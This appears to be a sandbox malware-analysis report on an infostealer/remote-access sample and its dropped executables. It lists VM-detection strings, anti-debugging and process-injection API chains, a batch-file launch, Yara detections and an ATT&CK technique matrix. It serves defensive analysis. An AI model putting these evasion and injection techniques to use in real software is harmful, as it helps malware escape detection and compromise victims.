            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
            Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
            Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!!E
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: *Windows 11 Server Standard without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: ,Windows 2016 Server Standard without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V (core)
            Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
            Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.4459782824.0000000001691000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_1AEAD613
            Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: VBoxService.exe
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V
            Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: *Windows 10 Server Standard without Hyper-V
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*QH
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
            Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: VMWare
            Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
            Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: #Windows 11 Microsoft Hyper-V Server
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeAPI call chain: ExitProcess graph end nodegraph_1-1029

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_01092014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01092014
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FCA100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,0_2_00FCA100
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_01ADA044 mov eax, dword ptr fs:[00000030h]0_2_01ADA044
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FC4AB0 mov eax, dword ptr fs:[00000030h]0_2_00FC4AB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0109A044 mov eax, dword ptr fs:[00000030h]7_2_0109A044
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_00584AB0 mov eax, dword ptr fs:[00000030h]7_2_00584AB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0109A044 mov eax, dword ptr fs:[00000030h]8_2_0109A044
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_00584AB0 mov eax, dword ptr fs:[00000030h]8_2_00584AB0
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FBA400 GetModuleHandleA,GetProcAddress,GetProcessHeap,RtlAllocateHeap,HeapFree,RtlAllocateHeap,HeapFree,0_2_00FBA400
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_01092014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01092014
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_0108DADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0108DADD
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_00652014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00652014
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0064DADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0064DADD
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_00652014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00652014
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0064DADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0064DADD

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FCA100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,0_2_00FCA100
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0058A100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,7_2_0058A100
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0058A100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,8_2_0058A100
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "
            Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: GetLocaleInfoW,0_2_010AD930
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: EnumSystemLocalesW,0_2_010A49BA
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: EnumSystemLocalesW,0_2_010AD9D7
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_010AE0A0
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_010ADB48
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: EnumSystemLocalesW,0_2_010ADA22
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: EnumSystemLocalesW,0_2_010ADABD
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: GetLocaleInfoW,0_2_010ADD9B
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: GetLocaleInfoA,0_2_01898D69
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_010AD72B
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: GetLocaleInfoW,0_2_010A4F3D
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: GetLocaleInfoW,0_2_010ADFCA
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_010ADEC4
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_0066E0A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,7_2_0066D930
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: EnumSystemLocalesW,7_2_0066D9D7
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: EnumSystemLocalesW,7_2_006649BA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: EnumSystemLocalesW,7_2_0066DA22
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: EnumSystemLocalesW,7_2_0066DABD
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_0066DB48
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,7_2_0066DD9B
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_0066DEC4
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,7_2_0066D72B
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,7_2_00664F3D
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,7_2_0066DFCA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_0066E0A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,8_2_0066D930
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: EnumSystemLocalesW,8_2_0066D9D7
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: EnumSystemLocalesW,8_2_006649BA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: EnumSystemLocalesW,8_2_0066DA22
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: EnumSystemLocalesW,8_2_0066DABD
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_0066DB48
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,8_2_0066DD9B
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_0066DEC4
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,8_2_0066D72B
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,8_2_00664F3D
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: GetLocaleInfoW,8_2_0066DFCA
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_0108CCDC GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_0108CCDC
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1E80 GetUserNameA,0_2_7ECA1E80
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeCode function: 1_2_00E6139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_00E6139F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: jHYZko.exe PID: 6484, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: jHYZko.exe PID: 2516, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Lisect_AVT_24003_G1A_89.exe PID: 4912, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 5272, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 3692, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 1716, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: jHYZko.exe PID: 6484, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: jHYZko.exe PID: 2516, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Lisect_AVT_24003_G1A_89.exe PID: 4912, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 5272, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 3692, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 1716, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid Accounts2
            Native API
            1
            Scripting
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            11
            System Time Discovery
            1
            Taint Shared Content
            1
            Archive Collected Data
            2
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            3
            Obfuscated Files or Information
            LSASS Memory1
            Account Discovery
            Remote Desktop Protocol11
            Input Capture
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Scheduled Task/Job
            112
            Process Injection
            13
            Software Packing
            Security Account Manager4
            File and Directory Discovery
            SMB/Windows Admin SharesData from Network Shared Drive11
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            Registry Run Keys / Startup Folder
            1
            Scheduled Task/Job
            1
            DLL Side-Loading
            NTDS24
            System Information Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Registry Run Keys / Startup Folder
            1
            Masquerading
            LSA Secrets1
            Query Registry
            SSHKeylogging12
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Virtualization/Sandbox Evasion
            Cached Domain Credentials231
            Security Software Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync11
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
            Process Injection
            Proc Filesystem12
            Process Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            Application Window Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
